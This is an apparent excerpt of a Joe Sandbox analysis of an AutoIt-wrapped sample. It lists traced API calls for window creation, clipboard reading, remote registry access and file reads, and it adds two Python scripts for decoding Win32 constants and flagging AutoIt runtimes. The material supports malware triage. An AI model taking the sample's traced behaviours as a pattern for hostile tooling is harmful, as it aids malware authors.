• SelectObject.GDI32(00000000,00000000), ref: 004592B4
• GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
• DeleteDC.GDI32(00000000), ref: 004592D6
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
• GetStockObject.GDI32(00000011), ref: 004593D3
• SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
• Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
• Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
• Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
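Reading the GUI trace above means decoding raw constants: the style word 88C00000 on the window of class AutoIt v3, the 00000401 and 00000404 messages sent after the msctls_progress32 control is created, the 00000030 passed to SystemParametersInfoW, the 00000011 stock object. The script below is an added example, not Joe Sandbox code: it parses API-trace lines in this report's format and annotates the arguments with their documented Win32 names (winuser.h, wingdi.h and commctrl.h values). The TRACE sample is made of lines copied from the report's GUI, cursor and colour functions, with the ShowWindow line cut to its first three arguments. The positional workaround for dwStyle in CreateWindowExW is my own handling of the two differently aligned CreateWindowExW lines in the trace, not documented sandbox behaviour.

```python
"""Decode the Win32 constants in Joe Sandbox API-trace lines.

Added example, not Joe Sandbox code. Constant values are the documented
winuser.h / wingdi.h / commctrl.h ones; TRACE holds lines copied from the
report's GUI, cursor and colour function traces.
"""
import re

# Window styles as (mask, name); WS_CAPTION is listed before the two bits it is built from.
WS = [(0x80000000, "WS_POPUP"), (0x40000000, "WS_CHILD"), (0x10000000, "WS_VISIBLE"),
      (0x08000000, "WS_DISABLED"), (0x04000000, "WS_CLIPSIBLINGS"), (0x00C00000, "WS_CAPTION"),
      (0x00800000, "WS_BORDER"), (0x00400000, "WS_DLGFRAME"), (0x00080000, "WS_SYSMENU")]
WS_EX = [(0x00000008, "WS_EX_TOPMOST"), (0x00000200, "WS_EX_CLIENTEDGE")]
CTRL_STYLE = {"msctls_progress32": [(0x1, "PBS_SMOOTH")]}   # low-word styles, per control class
# 0x04xx messages are WM_USER+n and only carry meaning for the receiving control class.
MSG = {0x000E: "WM_GETTEXTLENGTH", 0x0030: "WM_SETFONT",
       0x0401: "PBM_SETRANGE", 0x0402: "PBM_SETPOS", 0x0404: "PBM_SETSTEP"}
SIMPLE = {  # api -> (parameter name, argument index, value table)
    "SystemParametersInfoW": ("uiAction", 0, {0x30: "SPI_GETWORKAREA"}),
    "GetStockObject": ("i", 0, {0x11: "DEFAULT_GUI_FONT"}),
    "GetDeviceCaps": ("index", 1, {0x5A: "LOGPIXELSY"}),
    "ShowWindow": ("nCmdShow", 1, {0: "SW_HIDE", 4: "SW_SHOWNOACTIVATE", 5: "SW_SHOW"}),
    "GetSysColor": ("nIndex", 0, {0x0E: "COLOR_HIGHLIGHTTEXT", 0x0F: "COLOR_BTNFACE",
                                  0x10: "COLOR_BTNSHADOW", 0x11: "COLOR_BTNTEXT", 0x12: "COLOR_GRAYTEXT"}),
    "LoadCursorW": ("lpCursorName", 1, {0x7F00: "IDC_ARROW", 0x7F01: "IDC_IBEAM", 0x7F02: "IDC_WAIT",
                                        0x7F03: "IDC_CROSS", 0x7F04: "IDC_UPARROW", 0x7F82: "IDC_SIZENWSE",
                                        0x7F83: "IDC_SIZENESW", 0x7F84: "IDC_SIZEWE", 0x7F85: "IDC_SIZENS",
                                        0x7F86: "IDC_SIZEALL", 0x7F88: "IDC_NO", 0x7F89: "IDC_HAND",
                                        0x7F8A: "IDC_APPSTARTING", 0x7F8B: "IDC_HELP"}),
}
SIMPLE["GetSysColorBrush"] = SIMPLE["GetSysColor"]

# Lines copied from the report (the ShowWindow line is cut after its first three arguments).
TRACE = """\
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
• CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
• GetStockObject.GDI32(00000011), ref: 004592AC
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
• ShowWindow.USER32(?,00000004,?), ref: 004593EE
• LoadCursorW.USER32(00000000,00007F89), ref: 00430754
• GetSysColor.USER32(00000012), ref: 0044181E
"""

LINE = re.compile(r"(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)")


def parse_args(text):
    """'00000008,AutoIt v3,?' -> [8, 'AutoIt v3', None]; '?' is a value the sandbox could not resolve."""
    out = []
    for a in (s.strip() for s in text.split(",")):
        out.append(None if a == "?" else int(a, 16) if re.fullmatch(r"[0-9A-F]{8}", a) else a)
    return out


def flag_names(value, table):
    """Split a style word into named bits; bits with no table entry stay as hex."""
    names = []
    for mask, name in table:
        if value & mask == mask:
            names.append(name)
            value &= ~mask
    if value:
        names.append(f"0x{value:X}")
    return "|".join(names) or "0"


def decode(api, args):
    """Return {parameter: meaning} for the arguments whose constant is known."""
    notes = {}
    if api == "CreateWindowExW":
        cls = next((a for a in args if isinstance(a, str)), "?")
        notes["lpClassName"] = cls
        if isinstance(args[0], int):
            notes["dwExStyle"] = flag_names(args[0], WS_EX)
        # The report's traces sometimes shift an argument (compare the two CreateWindowExW
        # lines in TRACE), so locate dwStyle by its WS_POPUP/WS_CHILD bits rather than by position.
        style = next((a for a in args if isinstance(a, int) and a & 0xC0000000), None)
        if style is not None:
            notes["dwStyle"] = flag_names(style, WS + CTRL_STYLE.get(cls, []))
    elif api == "SendMessageW" and len(args) > 1 and isinstance(args[1], int):
        msg = args[1]
        notes["Msg"] = MSG.get(msg, f"0x{msg:X}")
        if msg == 0x0401 and len(args) > 3 and isinstance(args[3], int):  # PBM_SETRANGE: MAKELPARAM(min, max)
            notes["lParam"] = f"range {args[3] & 0xFFFF}..{args[3] >> 16}"
        if msg == 0x0404 and len(args) > 2 and isinstance(args[2], int):  # PBM_SETSTEP: wParam = step
            notes["wParam"] = f"step {args[2]}"
    elif api in SIMPLE:
        name, idx, table = SIMPLE[api]
        if idx < len(args) and isinstance(args[idx], int) and args[idx] in table:
            notes[name] = table[args[idx]]
    return notes


def annotate(trace):
    """Parse each trace line into {'ref', 'api', 'notes'}; lines that do not parse are skipped."""
    rows = []
    for line in trace.splitlines():
        m = LINE.search(line)
        if m:
            rows.append({"ref": m["ref"], "api": m["api"], "notes": decode(m["api"], parse_args(m["args"]))})
    return rows


if __name__ == "__main__":
    for row in annotate(TRACE):
        print(row["ref"], row["api"], row["notes"])
```

Run as a script it reports, among other things, that the CreateWindowExW at 00459242 builds a WS_POPUP|WS_DISABLED|WS_CAPTION window with WS_EX_TOPMOST of class AutoIt v3, that the message at 00459382 is PBM_SETRANGE with a 0..100 range and the one at 00459393 PBM_SETSTEP with step 1, and that the window is shown with SW_SHOWNOACTIVATE. A disabled, topmost popup holding one smooth progress bar and two static labels, sized by SPI_GETWORKAREA and set in DEFAULT_GUI_FONT, is the shape of an AutoIt progress splash; that is my reading of the trace, not a statement the report makes, and it is useful when a small progress window flashes during detonation of an AutoIt-wrapped sample.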
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-3360698832
• Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
• Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
• Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
• Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
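The strings this __wcsnicmp routine compares against are AutoIt3 preprocessor directives (#include, #include-once, #cs/#ce, #NoAutoIt3Execute, #OnAutoItStartRegister and so on), together with the parser's own error messages; a function that recognises them is the interpreter's directive parser, so their presence in the process image identifies the AutoIt3 runtime, consistent with the AutoIt v3 window class seen in the GUI functions of this dump. The script below is an added triage check, not part of the report: it scans a memory dump or dropped PE for those directives in UTF-16LE (the wide-string form the interpreter compares) with ASCII as a fallback, discards matches that are only prefixes of a longer identifier, and applies a threshold of my own choosing before calling the image an AutoIt3 runtime. Both blobs it scans are constructed for the example, not the sample's memory.

```python
"""Flag an AutoIt3 interpreter image by its preprocessor-directive strings.

Added example, not part of the report. The directives are the String ID
entries of the __wcsnicmp function above; AutoIt compares them as wide
strings, so the scan looks for UTF-16LE first and ASCII as a fallback.
The blobs scanned at the bottom are constructed here, not the sample's dump.
"""
import re

DIRECTIVES = ["#NoAutoIt3Execute", "#OnAutoItStartRegister", "#comments-start", "#comments-end",
              "#cs", "#ce", "#include-once", "#include", "#notrayicon", "#requireadmin"]
WINDOW_CLASS = "AutoIt v3"            # window class name the report shows in CreateWindowExW
ENCODINGS = ("utf-16-le", "ascii")
MIN_DIRECTIVES = 4                    # heuristic threshold chosen for this example, not an AutoIt fact


def _ends_token(blob, end, enc):
    """True unless the match continues as an identifier, so '#include' is not counted inside '#include-once'."""
    width = 2 if enc == "utf-16-le" else 1
    nxt = blob[end:end + width]
    if len(nxt) < width:
        return True
    try:
        return re.fullmatch(r"[A-Za-z0-9-]", nxt.decode(enc)) is None
    except UnicodeDecodeError:
        return True


def find_markers(blob):
    """Return {marker: [(offset, encoding), ...]} for every directive or class-name string in blob."""
    hits = {}
    for marker in DIRECTIVES + [WINDOW_CLASS]:
        for enc in ENCODINGS:
            needle = marker.encode(enc)
            pos = blob.find(needle)
            while pos != -1:
                if _ends_token(blob, pos + len(needle), enc):
                    hits.setdefault(marker, []).append((pos, enc))
                pos = blob.find(needle, pos + 1)
    return hits


def is_autoit_runtime(hits):
    """The window class plus several directives together point at the interpreter, not at a lone script."""
    found = sum(1 for d in DIRECTIVES if d in hits)
    return WINDOW_CLASS in hits and found >= MIN_DIRECTIVES


def _wide_table(*strings):
    """Constructed stand-in for a NUL-terminated UTF-16LE string table inside a PE image."""
    return b"".join(s.encode("utf-16-le") + b"\x00\x00" for s in strings)


# Constructed test data: a fake AutoIt-like image, and a benign blob that merely contains '#include'.
AUTOIT_LIKE = b"MZ" + b"\x00" * 62 + _wide_table(
    WINDOW_CLASS, "#NoAutoIt3Execute", "#OnAutoItStartRegister", "#include-once",
    "#include", "#cs", "#ce", "Cannot parse #include")
BENIGN = b"some C source: #include <stdio.h>\n" + b"\x00" * 16


if __name__ == "__main__":
    for name, blob in (("autoit-like", AUTOIT_LIKE), ("benign", BENIGN)):
        hits = find_markers(blob)
        print(name, "->", is_autoit_runtime(hits), sorted(hits))
```

Offsets are returned so a hit can be cross-checked against the section it lands in (a directive table in .rdata of the main module is the interpreter; the same string in a heap region is more likely the script being parsed). The threshold and the token-boundary rule are choices made for this example; tune them against known-good AutoIt builds before relying on the verdict.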
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 00430754
• SetCursor.USER32(00000000), ref: 0043075B
• LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
• SetCursor.USER32(00000000), ref: 00430773
• LoadCursorW.USER32(00000000,00007F03), ref: 00430784
• SetCursor.USER32(00000000), ref: 0043078B
• LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
• SetCursor.USER32(00000000), ref: 004307A3
• LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
• SetCursor.USER32(00000000), ref: 004307BB
• LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
• SetCursor.USER32(00000000), ref: 004307D3
• LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
• SetCursor.USER32(00000000), ref: 004307EB
• LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
• SetCursor.USER32(00000000), ref: 00430803
• LoadCursorW.USER32(00000000,00007F85), ref: 00430814
• SetCursor.USER32(00000000), ref: 0043081B
• LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
• SetCursor.USER32(00000000), ref: 00430833
• LoadCursorW.USER32(00000000,00007F84), ref: 00430844
• SetCursor.USER32(00000000), ref: 0043084B
• LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
• SetCursor.USER32(00000000), ref: 00430863
• LoadCursorW.USER32(00000000,00007F02), ref: 00430874
• SetCursor.USER32(00000000), ref: 0043087B
• SetCursor.USER32(00000000), ref: 00430887
• LoadCursorW.USER32(00000000,00007F00), ref: 00430898
• SetCursor.USER32(00000000), ref: 0043089F
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Cursor$Load
• String ID:
• API String ID: 1675784387-0
• Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
• Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
• Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
• Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                              APIs
                                                                                              • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                              • GetSysColor.USER32(00000012), ref: 00430933
                                                                                              • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                              • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                              • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                              • GetSysColor.USER32(00000011), ref: 00430979
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
• SelectObject.GDI32(?,00000000), ref: 0043099C
• SetBkColor.GDI32(?,?), ref: 004309A6
• SelectObject.GDI32(?,?), ref: 004309B4
• InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
• GetWindowLongW.USER32(?,000000F0), ref: 00430A09
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
• GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
• InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
• DrawFocusRect.USER32(?,?), ref: 00430A91
• GetSysColor.USER32(00000011), ref: 00430A9F
• SetTextColor.GDI32(?,00000000), ref: 00430AA7
• DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
• SelectObject.GDI32(?,?), ref: 00430AD0
• DeleteObject.GDI32(00000105), ref: 00430ADC
• SelectObject.GDI32(?,?), ref: 00430AE3
• DeleteObject.GDI32(?), ref: 00430AE9
• SetTextColor.GDI32(?,?), ref: 00430AF0
• SetBkColor.GDI32(?,?), ref: 00430AFB
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1582027408-0
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
• RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
Similarity
• API ID: CloseConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 3217815495-966354055
APIs
• GetCursorPos.USER32(?), ref: 004566AE
• GetDesktopWindow.USER32 ref: 004566C3
• GetWindowRect.USER32(00000000), ref: 004566CA
• GetWindowLongW.USER32(?,000000F0), ref: 00456722
• GetWindowLongW.USER32(?,000000F0), ref: 00456735
• DestroyWindow.USER32(?), ref: 00456746
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
• SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
• SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
• SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
• SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
• IsWindowVisible.USER32(?), ref: 0045682C
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
• SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
• GetWindowRect.USER32(?,?), ref: 00456873
• MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
• GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
• CopyRect.USER32(?,?), ref: 004568BE
• SendMessageW.USER32(?,00000412,00000000), ref: 00456914
Similarity
• API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
• String ID: ($,$tooltips_class32
• API String ID: 225202481-3320066284
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
• API String ID: 15083398-0
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetWindowRect.USER32(?,?), ref: 00471CF7
• GetClientRect.USER32(?,?), ref: 00471D05
• GetSystemMetrics.USER32(00000007), ref: 00471D0D
• GetSystemMetrics.USER32(00000008), ref: 00471D20
• GetSystemMetrics.USER32(00000004), ref: 00471D42
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
• GetSystemMetrics.USER32(00000007), ref: 00471D79
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
• GetSystemMetrics.USER32(00000008), ref: 00471DAB
• GetSystemMetrics.USER32(00000004), ref: 00471DCF
• SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
• AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
• SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
• GetClientRect.USER32(?,?), ref: 00471E8A
• GetStockObject.GDI32(00000011), ref: 00471EA6
• SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
• SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
Similarity
• API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
• String ID: @$AutoIt v3 GUI
• API String ID: 867697134-3359773793
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1503153545-1459072770
Similarity
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
• API String ID: 790654849-32604322
                                                                                              • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                              • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                              • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                              • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                              • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                              • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                              • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                              APIs
                                                                                                • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                              • _fseek.LIBCMT ref: 00452B3B
                                                                                              • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                              • _wcscpy.LIBCMT ref: 00452BB0
                                                                                              • _wcscat.LIBCMT ref: 00452BC5
                                                                                              • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                              • _wcscat.LIBCMT ref: 00452C07
                                                                                              • _wcscat.LIBCMT ref: 00452C1C
                                                                                              • __fread_nolock.LIBCMT ref: 00452C53
                                                                                              • __fread_nolock.LIBCMT ref: 00452C64
                                                                                              • __fread_nolock.LIBCMT ref: 00452C83
                                                                                              • __fread_nolock.LIBCMT ref: 00452C94
                                                                                              • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                              • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                              • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                              • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                              • __fread_nolock.LIBCMT ref: 00452D78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                              • String ID:
                                                                                              • API String ID: 2054058615-0
                                                                                              • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                              • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
